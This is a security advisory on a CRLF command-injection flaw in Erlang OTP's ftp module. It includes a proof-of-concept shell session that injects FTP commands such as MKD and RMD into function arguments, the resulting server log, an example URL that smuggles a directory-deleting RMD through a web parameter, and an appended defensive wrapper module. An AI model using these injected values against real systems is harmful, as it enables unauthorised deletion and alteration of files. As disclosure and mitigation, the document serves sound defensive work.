Erlang OTP ftp module FTP Command Injection

2014.01.29
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hi,

This has been reported to the erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html

There is an FTP Command Injection vulnerability in the "ftp" module. All functions that write a string argument to the control socket appear to be vulnerable:

user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3

Vulnerability Description
-------------------------

By injecting a \r\n sequence followed by a new command into a function argument, the ftp module writes the whole string to the control socket unchanged, so the server executes the injected command as if the client had sent it.

E.g. the following erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok

generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)."

Attack Scenario Example
-----------------------

A web server allows users to navigate and download documents. Internally the web server connects to a private ftp server using the OTP "ftp" module.

An attacker might take advantage of the vulnerability to execute actions that aren't supposed to be exposed. E.g. delete a directory by requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------

- Erlang OTP: R15B03
- Ubuntu 12.04 x86_64
- FTP Server: vsftpd

Mitigation
----------

Until this is fixed and the proper sanitization is implemented within the ftp module, string arguments should have "\r" and "\n" removed before being passed to these functions.

Sebastián Tello
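The following wrapper module is an added example, not part of the advisory or of OTP; it applies the mitigation above by checking every string argument for CR/LF before it reaches the ftp module. The module name safe_ftp, its exported functions and the strict reject-instead-of-strip policy are assumptions of this example.

```erlang
%% safe_ftp.erl (added example; assumed module name, not OTP code).
%% Guards the OTP ftp calls named in the advisory so that a "\r" or "\n"
%% in a caller-supplied string can never be written to the control socket.
-module(safe_ftp).
-export([check/1, sanitize/1, cd/2, mkdir/2, rmdir/2, delete/2, user/3]).

%% Strict policy: refuse any argument containing CR or LF. Rejecting is
%% safer than stripping, because stripping silently turns the decoded
%% attack string "/docs/\r\nRMD /docs" into the path "/docs/RMD /docs",
%% which the caller never asked for.
check(Arg) when is_list(Arg) ->
    case lists:any(fun(C) -> C =:= $\r orelse C =:= $\n end, Arg) of
        true  -> {error, crlf_injection};
        false -> {ok, Arg}
    end;
check(Arg) when is_binary(Arg) ->
    check(binary_to_list(Arg)).

%% Lenient policy, exactly what the advisory's mitigation describes:
%% remove "\r" and "\n" and pass the rest through.
sanitize(Arg) when is_list(Arg) ->
    [C || C <- Arg, C =/= $\r, C =/= $\n];
sanitize(Arg) when is_binary(Arg) ->
    list_to_binary(sanitize(binary_to_list(Arg))).

%% Guarded wrappers: every string is validated before the real ftp call.
cd(Pid, Dir)          -> guarded([Dir], fun() -> ftp:cd(Pid, Dir) end).
mkdir(Pid, Dir)       -> guarded([Dir], fun() -> ftp:mkdir(Pid, Dir) end).
rmdir(Pid, Dir)       -> guarded([Dir], fun() -> ftp:rmdir(Pid, Dir) end).
delete(Pid, File)     -> guarded([File], fun() -> ftp:delete(Pid, File) end).
user(Pid, User, Pass) -> guarded([User, Pass],
                                 fun() -> ftp:user(Pid, User, Pass) end).

%% Run Call only if no argument fails check/1; otherwise report which
%% arguments carried CR/LF so the caller can log the attempt.
guarded(Args, Call) ->
    case [A || A <- Args, element(1, check(A)) =:= error] of
        []  -> Call();
        Bad -> {error, {crlf_injection, Bad}}
    end.
```

A web front end such as the list_dir.yaws example in the advisory would call safe_ftp:cd/2 with the decoded query parameter and treat {error, {crlf_injection, _}} as a request to log and refuse rather than forward.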

References:

http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html
